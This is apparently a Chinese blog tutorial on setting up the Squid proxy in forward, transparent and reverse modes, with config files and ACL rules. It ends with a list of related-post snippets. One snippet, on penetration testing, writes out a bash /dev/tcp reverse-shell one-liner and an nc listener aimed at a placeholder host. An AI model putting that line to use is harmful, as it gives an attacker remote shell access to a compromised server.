不知道灬都不知道
不知道灬都不知道

Squid代理服务

Squid代理服务

一、squid概述

1、squid简介

​ Squid cache(简称为Squid)是流行最广的,使用最普遍的开源缓存代理服务器。squid的主要作用和应用场景有:

  • 用来做前置的Web缓存,加快用户访问Web的速度

  • 代理内网用户访问互联网资源

  • 设置访问控制策略,控制用户的上网行为
  • 主要支持http、ftp等应用协议

2、工作原理

Squid代理服务_第1张图片

二、squid代理类型

1、正向代理

Squid代理服务_第2张图片

2、透明代理

Squid代理服务_第3张图片

正向代理的过程隐藏了真实的请求客户端,服务器不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替请求。我们常说的代理也就是正向代理,正向代理代理的是请求方,也就是客户端。

3、反向代理

Squid代理服务_第4张图片

反向代理的过程隐藏了真实的服务器,客户不知道真正提供服务的人是谁,客户端请求的服务都被代理服务器处理。反向代理代理的是响应方,也就是服务端。

总结:

  1. 正向代理和透明代理中的代理服务器和客户端同属一个LAN,对server端是透明的,服务器并不知道自己为谁提供服务。作用都是让内网用户可以通过代理服务器上互联网,也可以提高访问速度,并且可以通过代理服务器的访问控制限制内网用户的上网行为。
  2. 反向代理的过程隐藏了真正的服务器,对client端是透明的,客户端并不知道真正提供服务的服务器。可以起到负载均衡的作用,提高用户的访问速度。
  3. 两者的区别在于代理的对象不一样:正向代理代理的对象是客户端,反向代理代理的对象是服务端
  4. 应用场景
    • 正向和透明代理:一般用于公司内网用户访问互联网,根据需求进行访问控制
    • 反向代理:一般用于公司服务器集群前做web缓存,提高用户访问效率,同时可以起到负载均衡作用,为互联网提供可持续的web服务。

三、squid与SNAT和DNAT的区别

1. SNAT和DNAT

  • 网络层次:网络层

    局域网用户访问外网走snat模式,同一个数据包,改变数据包头部的来源地址,再把数据包发到internet。

  • 作用:内网用户上外网(SNAT)和内网服务发布到公网(DNAT)

2. 代理服务器模式

  • 网络层次:应用层

    不改变数据包头信息,把数据包代理给internet的服务器,基于应用层的过滤。

  • 应用层:

    • 协议:http、ftp、pop、smtp、p2p等
  • 作用:缓存页面,加速访问,ACL资源访问控制
  • 反向代理:
    • internet用户访问局域网服务器
    • Squid做反向代理服务器,把用户的请求转发到后方的真实的服务器,可以做到负载均衡的效果,同时缓冲用户经常访问的页面提高访问速度。

四、squid软件

1、相关软件

官网地址:http://www.squid-cache.org/

2、 软件相关列表

[root@squid-server ~]# rpm -ql squid
/etc/squid/squid.conf           //配置文件
/etc/rc.d/init.d/squid              //启动脚本
/usr/sbin/squid                     //二进制命令
/usr/share/doc/squid-3.1.10          //手册
/var/log/squid                      //日志目录
/var/spool/squid                    //缓存目录

3、配置文件说明

# cat /etc/squid/squid.conf
//设置监听的IP与端口号
http_port 3128

//额外提供给squid使用的内存大小
cache_mem   默认256 MB   

//设置squid磁盘缓存最大文件,超过4M的文件不保存到硬盘
maximum_object_size 4 MB   

//设置squid磁盘缓存最小文件
minimum_object_size 0 KB 

//设置squid内存缓存最大文件,超过4M的文件不保存到内存
maximum_object_size_in_memory 4096 KB   

//定义squid的cache存放路径 、cache目录容量(单位M)、一级缓存目录数量、二级缓存目录数量
cache_dir ufs /var/spool/squid 100 16 256   

//log文件日志格式
logformat combined %&gt;a %ui %un [%tl] "%rm %ru HTTP/%rv" %Hs %<st "%{Referer}>h" "%{User-Agent}>h" %Ss:%Sh        

//log文件存放路径和日志格式
access_log /var/log/squid/access.log combined  

//设置缓存日志
cache_log /var/log/squid/cache.log   

//log轮转60天
logfile_rotate 60   

//cache目录使用量大于95%时,开始清理旧的cache
cache_swap_high 95  

//cache目录清理到90%时停止
cache_swap_low 90   

//定义本地网段
acl localnet src 192.168.1.0/24  

//允许本地网段使用
http_access allow localnet  

//拒绝所有
http_access deny all  

//主机名
visible_hostname xxx.xxxx.xxxx 

//管理员邮箱
cache_mgr 123456@qq.com

五、squid的正向代理

  • 需求:client通过代理服务器squid-server访问web-server服务器
client: 192.168.221.129
squid-server: 192.168.221.139192.168.226.137
web-server192.168.226.135

squid-server设置:
[root@squid-server ~]# vim /etc/squid/squid.conf
 59 #http_access deny all
 60 http_access allow all                           //允许访问

 69 cache_dir ufs /var/spool/squid 100 16 256         //打卡缓存
 70 visible_hostname min1.yu.net                     //设置主机名
 71 access_log      /var/log/squid/access.log         //定义访问日志

[root@squid-server ~]# service squid start           //启动服务
init_cache_dir /var/spool/squid... Starting squid: .   [  OK  ]

[root@squid-server ~]# ls /var/spool/squid/
00  02  04  06  08  0A  0C  0E  swap.state
01  03  05  07  09  0B  0D  0F
//服务器启动后会再缓存目录里产生以下一级、二级缓存目录文件
[root@squid-server ~]# netstat -ntpl |grep squid     //检查端口
tcp        0      0 :::3128                     :::*                        LISTEN      3355/(squid)

注意:

​ 若重启squid会报如下警告:

[root@squid-server ~]# service squid restart
Stopping squid: 2018/06/30 20:55:58| WARNING cache_mem is larger than total disk cache space!
................                                       [  OK  ]
Starting squid: .                                      [  OK  ]

原因:
    默认情况下,cache_mem为256M,而squid的配置里磁盘缓存默认为100M
解决:
    方法1:调小cache_mem的值
    在配置文件中增加:cache_mem 100 MB
    方法2:调大磁盘缓存
    修改配置文件中如下内容:
    cache_dir ufs /var/spool/squid 256 16 256   ——>把100换成256

说明:squid缓存从  内存     ————>   磁盘
                cache_mem       /var/spool/squid
  • web-server端:搭建web服务
  • client端:设置访问代理
客户端不需要设置网关和DNS:
[root@client ~]# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.221.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0
169.254.0.0     0.0.0.0         255.255.0.0     U     1002   0        0 eth0
0.0.0.0         192.168.221.1   0.0.0.0         UG    0      0        0 eth0

配置代理服务器前:不能够直接访问web服务
[root@client ~]# ping 192.168.226.135
PING 192.168.226.135 (192.168.226.135) 56(84) bytes of data.
^C
--- 192.168.226.135 ping statistics ---
14 packets transmitted, 0 received, 100% packet loss, time 13245ms
[root@client ~]# curl 192.168.226.135
curl: (7) couldn't connect to host

浏览器配置代理服务器:指定代理服务器的IP和端口
Firefox:
Edit————>Preference————>Advanced————>Network————>Settings————>Manual proxy configuration
编辑--首选项--高级--网络--设置-- 手动填写代理服务器的IP和代理端口

Chrome:
设置——>高级——>打开代理设置——>连接——>局域网设置——>为LAN使用代理服务器前打勾并填上代理服务器的内网IP及其代理端口
IE:
设置——>Internet选项——>连接——>局域网设置--为LAN使用代理服务器前打勾并填上代理服务器的内网IP及其代理端口

若是Linux命令行界面,需要修改环境变量
[root@client ~]# vim /etc/profile
81 http_proxy=192.168.221.139:3128      //http协议访问时使用代理,也可以设置https,ftp等协议
82 export http_proxy
[root@client ~]# source /etc/profile

//测试
[root@client ~]# curl 192.168.226.135      //curl测试
this is squid-server  test page ,IP is 192.168.226.135

[root@client ~]# wget 192.168.226.135      //wget测试
--2018-06-30 21:14:23--  http://192.168.226.135/
Connecting to 192.168.221.139:3128... connected.
Proxy request sent, awaiting response... 200 OK
Length: 55 [text/html]
Saving to: “index.html.2100%[==============>] 55          --.-K/s   in 0s      

2018-06-30 21:14:23 (4.86 MB/s) - “index.html.2” saved [55/55]

六、squid的透明代理

  • 需求:内网用户通过代理服务器可以直接访问互联网中的web服务,不用指定proxy地址和端口
实验环境:
client: 192.168.221.129
squid-server: 192.168.221.139192.168.226.137
web-server192.168.226.135

client配置:
1、清空刚才的代理设置。
2、指定自己的默认网关为squid-server的私有地址192.168.221.139
[root@client ~]# route add default gw 192.168.221.139
[root@client ~]# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.221.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0
169.254.0.0     0.0.0.0         255.255.0.0     U     1002   0        0 eth0
0.0.0.0         192.168.221.139 0.0.0.0         UG    0      0        0 eth0
0.0.0.0         192.168.221.1   0.0.0.0         UG    0      0        0 eth0
3、清空squid-server缓存
[root@squid-server ~]# cd  /var/spool/squid/
[root@squid-server squid]# ls
00  02  04  06  08  0A  0C  0E  swap.state
01  03  05  07  09  0B  0D  0F
[root@squid-server squid]# rm -rf *
//清空之前的缓存

squid-server端配置:
[root@squid-server ~]# vim /etc/squid/squid.conf
63 http_port 3128 transparent           //在代理端口后面加上transparent(透明),代表透明代理

[root@squid-server ~]# service squid restart       //重启服务
Stopping squid:                                        [FAILED]
init_cache_dir /var/spool/squid... Starting squid:     [  OK  ]

[root@squid-server ~]# iptables -t nat -I PREROUTING -s 192.168.221.0/24 -p tcp --dport 80 -j REDIRECT --to-port 3128    //添加防火墙规则 将访问80端口的报文重定向到3128端口
[root@squid-server ~]# iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  192.168.221.0/24     anywhere            tcp dpt:http redir ports 3128 

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         

//client 访问测试
[root@client ~]# curl 192.168.226.135
this is squid-server  test page ,IP is 192.168.226.135
[root@client ~]# wget 192.168.226.135
--2018-06-30 21:49:08--  http://192.168.226.135/
Connecting to 192.168.221.139:3128... connected.
Proxy request sent, awaiting response... 200 OK
Length: 55 [text/html]
Saving to: “index.html.4100%[==============>] 55          --.-K/s   in 0s      

2018-06-30 21:49:08 (15.4 MB/s) - “index.html.4” saved [55/55]
//访问成功
[root@client ~]# curl -I 192.168.226.135   //查看是否缓存
HTTP/1.0 200 OK
Last-Modified: Sat, 30 Jun 2018 10:38:20 GMT
Accept-Ranges: bytes
Content-Length: 55
Content-Type: text/html; charset=UTF-8
Date: Sat, 30 Jun 2018 11:28:18 GMT
Server: Apache/2.2.15 (CentOS)
ETag: "80c51-37-56fd9902ac503"
Age: 8529
X-Cache: HIT from min1.yu.net               //缓存成功代理服务器是min1.yu.net(也就是squid-server)
X-Cache-Lookup: HIT from min1.yu.net:3128
Via: 1.0 min1.yu.net (squid/3.1.10)
Connection: keep-alive

//停止server端httpd服务,依然可以访问web,证明缓存成功!
[root@server html]# service httpd stop
Stopping httpd:                                        [  OK  ]
[root@client ~]# wget 192.168.226.135
--2018-06-30 21:53:34--  http://192.168.226.135/
Connecting to 192.168.221.139:3128... connected.
Proxy request sent, awaiting response... 200 OK
Length: 55 [text/html]
Saving to: “index.html.5100%[==============>] 55          --.-K/s   in 0s      

2018-06-30 21:53:34 (18.0 MB/s) - “index.html.5” saved [55/55]

七、反向代理

  • 某公司内网搭建了一台web服务器,希望互联网用户来访问该web服务,越多越好
环境:
client:192.168.221.129
squid-server:192.168.221.139和192.168.226.137
web-server:192.168.226.135

搭建反向代理服务器:
修改squid配置文件:/etc/squid/squid.conf
[root@squid-server ~]# vim /etc/squid/squid.conf
 63 http_port  80 vhost
 64 cache_peer 192.168.226.135 parent 80 0 originserver

解释说明:
[root@squid-server ~]# less /usr/share/doc/squid-3.1.10/squid.conf.documented
...
cache_peer hostname type http-port icp-port [options]

cache_peer:做反向代理的关键字
hostname:代表后台真正的web服务器
type:代表代理服务器的类型,有PARENT和SIBLING两种;parent代表父亲,sibling代表兄弟伙伴
http-port:后台web服务的端口
icp-port:代表代理服务器之间通讯的端口(用于查询兄弟缓存的端口)
[options]:代表可选项
originserver:代表原始服务器(真正的web服务)
weight:代表权重
可查看 /usr/share/doc/squid-3.1.10/squid.conf.documented找详细信息

//测试
[root@client ~]# curl 192.168.221.139
this is test page
[root@client ~]# wget 192.168.221.139
--2018-07-02 17:10:26--  http://192.168.221.139/
Connecting to 192.168.221.139:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18 [text/html]
Saving to: “index.html.10”

100%[=============>] 18          --.-K/s   in 0s      

2018-07-02 17:10:26 (5.25 MB/s) - “index.html.10” saved [18/18]

//访问成功

八、squid的访问控制

1. 禁止IP地址为192.168.0.100的客户机上网
    acl test src 192.168.0.100      //定义来源IP,test可以自己定义,代表定义的IP
    http_access deny test           //拒绝test后面定义的源IP:192.168.0.100上网

2. 禁止192.168.1.0这个网段里的所有客户机上网
    acl test src 192.168.1.0/255.255.255.0
    或者
    acl test src 192.168.1.0/24
    http_access deny test

3. 禁止用户访问IP为210.21.118.68的网站
    acl test dst 210.21.118.68
    http_access deny test

4. 禁止用户访问域名为www.163.com的网站
    acl test dstdomain –i www.163.com                   //-i: 忽略大小写
    http_access deny test

5. 禁止用户访问域名包含有163.com的网站
    acl test url_regex –i 163.com           //使用正则表达式匹配URL地址 
    http_access deny test

6. 禁止用户访问包含有itcast关键字的URL
    acl test url_regex –i itcast
    http_access deny test

7. 禁止用户访问多个网址
    acl  test  dstdom_regex "/etc/squid/baddsturl"  
    //如果网址太多,可以写成一个文件,然后在这个文件里一行一个网站写上你要禁止的
    http_access deny test   

8. vip用户没有任何限制
    acl vip  arp  00:0C:29:79:0C:1A     //绑定mac地址
    http_access allow  vip 

9. 禁止192.168.2.0这个子网里所有客户机在周一至周五的9点到18点上网
    acl test1 src 192.168.2.0/255.255.255.0
    acl test2 time D 9:00-18:00
    http_access deny test1 test2

    时间列表:
        S   Sunday      周日
        M   Monday      周一
        T   Tuesday     周二
        W   Wednesday   周三
        H   Thursday    周四
        F   Friday      周五
        A   Saturday    周六
        D   All weekdays (M-F)  周一到周五

10. 禁止用户下载*.mp3,*.exe,*.zip,*.rar带有定义后缀名的文件
    acl test urlpath_regex –i \.mp3$ \.exe$ \.zip$ \.rar$ \.txt$
    //urlpath_regex:正则表达式匹配URI地址
    http_access deny test

注意:
    http_access deny的行为要写在allow的上方    先拒绝再允许

总结:acl访问控制,从上往下匹配,如果匹配到了规则不会往下走,如果都没有匹配上规则,则看最后面的
http_access allow|deny all

你可能感兴趣的:(Linux服务)

  • 笋丁网页自动回复机器人V3.0.0免授权版源码 希希分享 软希网58soho_cn源码资源笋丁网页自动回复机器人
    笋丁网页机器人一款可设置自动回复,默认消息,调用自定义api接口的网页机器人。此程序后端语言使用Golang,内存占用最高不超过30MB,1H1G服务器流畅运行。仅支持Linux服务器部署,不支持虚拟主机,请悉知!使用自定义api功能需要有一定的建站基础。源码下载:https://download.csdn.net/download/m0_66047725/89754250更多资源下载:关注我。安
  • NPM私库搭建-verdaccio(Linux) Beam007 npmlinux前端
    1、安装nodelinux服务器安装nodea)、官网下载所需的node版本https://nodejs.org/dist/v14.21.0/b)、解压安装包若下载的是xxx.tar.xz文件,解压命令为tar-xvfxxx.tar.xzc)、修改环境变量修改:/etc/profile文件#SETPATHFORNODEJSexportNODE_HOME=NODEJS解压安装的路径exportPAT
  • Android shell 常用 debug 命令 晨春计 Audiodebugandroidlinux
    目录1、查看版本2、am命令3、pm命令4、dumpsys命令5、sed命令6、log定位查看APK进程号7、log定位使用场景1、查看版本1.1、Android串口终端执行getpropro.build.version.release#获取Android版本uname-a#查看linux内核版本信息uname-r#单独查看内核版本1.2、linux服务器执行lsb_release-a#查看Lin
  • 如何重启Linux服务器? 老男孩IT教育 gitlinux运维
    在Linux操作系统中,提供了多种方法用于重启服务器,那么Linux服务器如何重启?以下列举了常用的几种方法,希望对大家有所帮助,快来看看吧。重启Linux服务器有以下几种方法:1、使用命令行使用reboot命令reboot使用shutdown命令shutdown-rnow2、使用systemctl使用以下命令:systemctlreboot3、使用web界面大多数现代Linux发行版本都提供一个
  • 服务器状态监控php源码,服务器状态监控_监控Linux服务器网站状态的SHELL脚本 温糯米 服务器状态监控php源码
    摘要腾兴网为您分享:监控Linux服务器网站状态的SHELL脚本,蜗牛集市,同花顺,探客宝,手柄助手等软件知识,以及日期倒计时插件,云南省教育资源公共,rui手机桌面,小屁孩桌面便签,合金装备崛起复仇,朝夕日历,photoshop图像处理软件,一年级学生每日计划表,悟空找房,饿了吗外卖商家版,逃生,中国民宿网,realpolitiks,交通安全知识竞赛,雅思流利说等软件it资讯,欢迎关注腾兴网。1
  • Linux搭建Java环境之jdk1.8安装图文教程 yundashi168 Java教程阿里云教程
    Linux的使用相信大家都要用到java吧!在使用java前我们得先安装jdk以及配置环境变量等工作;下面小编给大家分享关于Linux安装jdk的详细步骤:【Linux服务器远程连接工具】xshell6快捷下载,xftp6快捷下载温馨提示:xshell负责编写和执行Linux命令,就是大家都知道的命令行。xftp负责上传和下载文件。两款软件搭配使用。还有一款免费的国产的linux远程连接客户端—f
  • VMWare10下安装Centos7+PHP7.2+Mysql5.7+Nginx全流程 追风2019 服务器PHP7.2Mysq
    一、背景说明作为一名phper,基本和Linux服务器扯不开关系,如果习惯于在Windows下开发项目,结果是很长一段时间都会烦恼于上线后出现的各种问题,所以,如果线下开发环境也是Linux环境,这就极大保障了自己代码上线正确率。现在比较流行用一键安装工具,只是我在线上、线下都试过,线上虽然安装好了,但线下安装太费内存,安装了两次都因为内存不够失败。所以,鉴于这样的需求背景下,我们自然需要熟练、独
  • Linux-文件权限管理 蜡笔晴天 linux运维服务器
    目录目录前言Linux用户权限解析1.基本权限UGO1.1设置权限:2.高级权限2.1suid2.2sgid2.3sbit2.4sudo给普通用户提权3.特殊权限4.隐藏权限总结前言linux服务器上有严格的权限等级,如果权限过高导致误操作会增加服务器的风险。所以对于了解linux系统中的各种权限及要给用户,服务等分配合理的权限十分重要。文件权限大致分为基本权限、高级权限、特殊权限和隐藏权限,下面
  • linux查看jupyter运行,在Linux服务器上运行Jupyter notebook server教程 天启大烁哥
    在Linux服务器上运行Jupyternotebookserver教程很多deeplearning教程都推荐在jupyternotebook运行python代码,方便及时交互。但只在本地运行没有GPU环境,虽然googlecolab是个好办法,但发现保存模型后在云端找不到模型文件,且需要合理上网才能访问。于是想给实验室的服务器配置jupyternotebook,供本机远程访问。踩了不少坑,码一下教
  • 使用PHP和MQTT构建高效的物联网数据转发服务器流程 极客小张 php物联网服务器单片机运维MQTT数据库
    一、项目概述项目目标和用途本项目旨在搭建一个基于PHP的物联网服务器,能够接收来自各种传感器的数据,并通过MQTT协议将数据转发到其他设备或服务。该系统适用于智能家居、环境监测等场景,能够实现实时数据监控和远程控制。技术栈关键词PHPMQTTMySQLESP8266/ESP32(单片机)DHT11(温湿度传感器)Linux服务器Apache/Nginx二、系统架构系统架构设计本项目的系统架构主要由
  • 在 Linux 上部署javaWeb项目+图文详解_java web项目部署到linux服务器 2401_85154737 服务器linuxjava
    -f:force强制的意思,如果目标文件已经存在,不会询问直接覆盖-i:若目标已经存在,就会询问是否覆盖-u:若目标文件已经存在,且比目标文件新,才会更新#该命令可以把多个文件一次移动到一个文件夹中,但是最后的一个目标文件一要是“目录”。例如:mvfile1file2file3dir#把多个文件移动到dir目录中mvfile1file2#把file重命名为file26、rm命令该命令用于删除文件或
  • 【LINUX】阿里云linux服务器上使用iptables设置安全策略的方法_status=$(grep -i ubuntu etc issue) 2401_85154737 linux服务器阿里云
    yuminstall-yiptablesiptables安装好后就可以来配置规则了。由于作为web服务器来使用,所以对外要开放80端口,另外肯定要通过ssh进行服务器管理,22端口也要对外开放,当然最好是把ssh服务的默认端口改掉,在公网上会有很多人试图破解密码的,如果修改端口,记得要把该端口对外开发,否则连不上就悲剧了。下面提供配置规则的详细说明:第一步:清空所有规则当ChainINPUT(po
  • linux服务器时间相差8个小时的问题的解决方法 清风一徐 服务器linux运维
    出现时间差一般都是因为时区设置不正确所导致的。首先,使用date命令查看服务器的时间,date+%Z可以查看当前系统的时区设置。这里显示的是UTC时间,因为UTC是标准时间,而中国位于东八区,所以对应的时间是UTC时间加8小时,所以相差8个小时。root@localhost:~#date2023年07月05日星期三07:00:27UTCroot@localhost:~#date+%ZUTC重新设置
  • 8.12(LVS负载均衡) WPFwpf_ lvs负载均衡运维
    一、LVS(一)什么是LVSlinuxvirturalserver的简称,也就是linxu虚拟机服务器,这是一个由章文岩博士发起的开源项目,官网是http://www.linuxvirtualserver.org,现在lvs已经是linux内核标准的-部分,使用lvS可以达到的技术目标是:通过linux达到负载均衡技术和linux操作系统实现一个高性能高可用的linux服务器集群,他具有良好的可性
  • Nginx配置SSL证书 忘了呼吸的那只猫
    Nginx配置SSL证书,前提是Nginx安装成功和SSL证书已经获取。在我们下载的证书文件中有一个Nginx的文件夹,这里面的两个文件都是需要的。我们需要把这个两个文件上传到linux服务器中,推荐放到/etc/ssl/目录下然后我们需要去找到nginx的配置文件。ps-ef|grepnginx可以看到nginx的目录是/usr/local/nginx那么我们需要找到nginx.conf文件并修
  • linux命令之服务器之间文件传输 abments linux常用命令pythonpandas数据分析
    目录前言一、scp命令1.简单用法:2.使用示例:2.1.复制文件到本地2.2.复制文件夹到本地二、sftp命令1.简单用法:2.使用示例2.1下载文件2.2上传文件总结前言在使用linux服务器时,有可能会需要在服务器之间传入文件,在这里记录了两种命令来进行实现。分别是scp命令和stpf命令。下面将详细介绍这两个命令的使用。一、scp命令scp:远程文件拷贝程序,是securecopyprog
  • LVS基本介绍 weixin_34144450 前端操作系统ldapViewUI
    一、LVS概念LVS是LinuxVirtualServer的简称,也就是Linux虚拟服务器。这是一个由章文嵩博士发起的一个开源项目,它的官方网站是http://www.linuxvirtualserver.org/.现在LVS已经是Linux内核标准的一部分。使用LVS可以达到的技术目标是:通过LVS达到的负载均衡技术和Linux操作系统实现一个高性能高可用的Linux服务器群集,它具有良好的可
  • 【Linux服务器故障排查实用指南】 weixin_34214500 操作系统网络python
    原文地址:【Linux服务器故障排查实用指南】作者:蚁巡运维平台#运维#http://www.antvision.cn/由于造成网络问题的因素多种多样,因此网络故障排查技能就成了每位服务器或网络服务负责人必不可少的重要素质。Linux为我们提供了大量网络故障排查工具,在本文中,我们将讨论一些常见的网络问题,并介绍如何利用某些Linux工具追踪意外状况发生的根本原因。问题:服务器A无法与服务器B通信
  • linux服务器程序设计模型,Linux下几种并发服务器的实现模式(详解) tianjiaxiaoer linux服务器程序设计模型
    1>单线程或者单进程相当于短链接,当accept之后,就开始数据的接收和数据的发送,不接受新的连接,即一个server,一个client不存在并发。2>循环服务器和并发服务器1.循环服务器:一个server只能一次只能接收一个client,当当前client结束访问之后才能进行下一个client的连接。2.并发服务器:一个server同一时间可以响应很多客户端的访问。3>select+多线程模式并
  • Nginx中间件配置 message丶小和尚 中间件nginx中间件运维
    Nginx中间件配置概要相关内容技术细节链接概要用于Linux服务器,Nginx中间件搭建。相关内容配置涵盖域名配置,TLS配置,及配置安全的加密算法,处理跨域问题,请求头问题等技术细节nginx.conf配置文件userroot;worker_processes2;error_log/var/log/nginx/error.logwarn;pid/var/run/nginx.pid;events
  • 【云原生】Docker入门 -- 阿里云服务器Linux环境下安装Docker m0_61067876 服务器云原生docker
    输入y确认即可!️配置阿里云加速镜像打开阿里云控制台,弹性计算-->容器与镜像服务打开之后选择镜像工具-->镜像加速器,复制内容即可进入Linux服务器根据步骤配置镜像加速器#创建docker文件夹sudomkdir-p/etc/docker#打开文件并配置内容sudotee/etc/docker/daemon.json<<-'EOF'{"registry-mirrors":["https://p
  • phpstrom连接远程服务器 努力学习的笨小孩
    PHP开发工具phpstorm通过sftp和FTP远程连接服务器创建编辑远程项目PhpStorm是一个编辑PHP代码的PHP开发工具神器,应该说是目前世界上编辑PHP代码的最好用的PHP开发工具IDE了吧,本地项目的创建相信一般人都会,不过有时候我们可能项目运行在远程服务器上,比如有一种情况:在windows下使用PhpStorm编码,代码放在linux服务器上运行。还有一种情况,代码使用版本控制
  • python如何对excel批量加密_python实现linux服务器批量修改密码并生成execl weixin_39963523
    批量修改linux服务器密码,同时生成execl表格#!/usr/bin/envpython#coding:utf8#随机生成自定义长度密码fromrandomimportchoiceimportstring,pickledefGenPassword(length=8,chars=string.ascii_letters+string.digits):return''.join([choice(c
  • 使用Docker构建支持中文字体的Java镜像 DN金猿 dockerdockerjava文字方框
    做停车场生成二维码时,在代码中用到在图片上添加文字或水印,文字在本地正常显示,到linux服务器就显示方框,由于我用的是docker部署的java项目,所以在linux服务器中安装了中文字体还是无效,因为项目是部署中docker容器里。Fontfont3=newFont("微软雅黑",Font.PLAIN,72);微软雅黑字体显示方框(方框部分是添加的文字)后来查了很多资料,发现都不行。因为我的D
  • 【CentOS7】【配置本地yum源】 酷大有 centos
    转载自:https://zhuanlan.zhihu.com/p/5783873591本地使用yum源1.1基于iso镜像的centos源1.1.1准备iso#首先看自己使用的linux服务器内核版本[root@centos-2009home]#cat/etc/redhat-releaseCentOSLinuxrelease7.9.2009(Core)#下载对应版本的linux镜像#我这里用的时清
  • SSH和Git的基本知识 0zxm sshgit运维vscode
    教程PPT-lec2-2023秋冬实用技能拾遗(tonycrane.cc)B站视频SSH安全外壳协议概念SSH全称secureshell,安全外壳协议(安全的shell),是一个计算机网络协议(默认端口号为22)。通过ssh协议可以在客户端安全(提供身份认证、信息加密)的远程连接Linux服务器或其他设备。使用广泛的Xshell软件就是基于SSH协议远程连接。SSH远程连接之后能干什么?SSH远程
  • Linux中Git推送报错Permissions 0644 for ‘/root/.ssh/id_rsa‘ are too open 秦时明月之君临天下 LinuxGitGitHublinuxgitssh
    准备在Linux上配置秘钥,方便Git上传代码到GitHub。但是秘钥(id_rsa文件)是从本地Windows环境上传到Linux服务器上面的,在执行推送时报错了,如下:#gitpush-uoriginmainTheauthenticityofhost'github.com(20.205.243.166)'can'tbeestablished.ECDSAkeyfingerprintisSHA25
  • 汇总:20个Linux服务器性能调优技巧 开源Linux 数据库linuxjava大数据mysql
    Linux是一种开源操作系统,它支持各种硬件平台,Linux服务器全球知名,它和Windows之间最主要的差异在于,Linux服务器默认情况下一般不提供GUI(图形用户界面),而是命令行界面,它的主要目的是高效处理非交互式进程,响应时间并不是那么重要,相反,能够长时间处理高负载才是最关键的。Linux高可用服务器集群解决方案让IT系统管理员可以从容应对许多常见的硬件和软件故障,允许多台计算机一起工
  • LINUX环境中宝塔Python虚拟环境变量问题 老童聊AI 明哥陪你学Pythonpythonpythondjango
    在日常开发和维护过程中,尤其是在处理Linux服务器环境的数据修复或执行其他Django命令时,通常需要手动导入环境变量,操作起来非常不安全和麻烦。这对于开发者来说,特别是通过SSH工具操作时,显得尤为麻烦。每次操作都需要先加载环境变量,然后再执行脚本。例如:#变量加载exportDJANGO_ENV=productionexportDJANGO_SETTINGS_MODULE=douniu.se
  • 常见 反弹shell的方法 A 八方 安全
    在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。Bash反弹1.1方法一攻击者主机上执行监听:nc-lvvpport目标主机上执行:bash-i>&/dev/tcp/x.x.x.x/port0>&1#bash-i打开
  • 插入表主键冲突做更新 a-john
    有以下场景: 用户下了一个订单,订单内的内容较多,且来自多表,首次下单的时候,内容可能会不全(部分内容不是必须,出现有些表根本就没有没有该订单的值)。在以后更改订单时,有些内容会更改,有些内容会新增。 问题: 如果在sql语句中执行update操作,在没有数据的表中会出错。如果在逻辑代码中先做查询,查询结果有做更新,没有做插入,这样会将代码复杂化。 解决: mysql中提供了一个sql语
  • Android xml资源文件中@、@android:type、@*、?、@+含义和区别 Cb123456 @+@?@*
    一.@代表引用资源 1.引用自定义资源。格式:@[package:]type/name android:text="@string/hello"   2.引用系统资源。格式:@android:type/name     android:textColor="@android:color/opaque_red"
  • 数据结构的基本介绍 天子之骄 数据结构散列表树、图线性结构价格标签
    数据结构的基本介绍 数据结构就是数据的组织形式,用一种提前设计好的框架去存取数据,以便更方便,高效的对数据进行增删查改。正确选择合适的数据结构,对软件程序的高效执行的影响作用不亚于算法的设计。此外,在计算机系统中数据结构的作用也是非同小可。例如常常在编程语言中听到的栈,堆等,就是经典的数据结构。   经典的数据结构大致如下:   一:线性数据结构 (1):列表 a
  • 通过二维码开放平台的API快速生成二维码 一炮送你回车库 api
     现在很多网站都有通过扫二维码用手机连接的功能,联图网(http://www.liantu.com/pingtai/)的二维码开放平台开放了一个生成二维码图片的Api,挺方便使用的。闲着无聊,写了个前台快速生成二维码的方法。        html代码如下:(二维码将生成在这div下) ? 1  &nbs
  • ImageIO读取一张图片改变大小 3213213333332132 javaIOimageBufferedImage
    package com.demo; import java.awt.image.BufferedImage; import java.io.File; import java.io.IOException; import javax.imageio.ImageIO; /** * @Description 读取一张图片改变大小 * @author FuJianyon
  • myeclipse集成svn(一针见血) 7454103 eclipseSVNMyEclipse
                                     &n
  • 装箱与拆箱----autoboxing和unboxing darkranger J2SE
    4.2 自动装箱和拆箱 基本数据(Primitive)类型的自动装箱(autoboxing)、拆箱(unboxing)是自J2SE 5.0开始提供的功能。虽然为您打包基本数据类型提供了方便,但提供方便的同时表示隐藏了细节,建议在能够区分基本数据类型与对象的差别时再使用。 4.2.1 autoboxing和unboxing 在Java中,所有要处理的东西几乎都是对象(Object)
  • ajax传统的方式制作ajax aijuans Ajax
    //这是前台的代码 <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <% String path = request.getContextPath(); String basePath = request.getScheme()+
  • 只用jre的eclipse是怎么编译java源文件的? avords javaeclipsejdktomcat
    eclipse只需要jre就可以运行开发java程序了,也能自动 编译java源代码,但是jre不是java的运行环境么,难道jre中也带有编译工具? 还是eclipse自己实现的?谁能给解释一下呢问题补充:假设系统中没有安装jdk or jre,只在eclipse的目录中有一个jre,那么eclipse会采用该jre,问题是eclipse照样可以编译java源文件,为什么呢? &nb
  • 前端模块化 bee1314 模块化
    背景: 前端JavaScript模块化,其实已经不是什么新鲜事了。但是很多的项目还没有真正的使用起来,还处于刀耕火种的野蛮生长阶段。   JavaScript一直缺乏有效的包管理机制,造成了大量的全局变量,大量的方法冲突。我们多么渴望有天能像Java(import),Python (import),Ruby(require)那样写代码。在没有包管理机制的年代,我们是怎么避免所
  • 处理百万级以上的数据处理 bijian1013 oraclesql数据库大数据查询
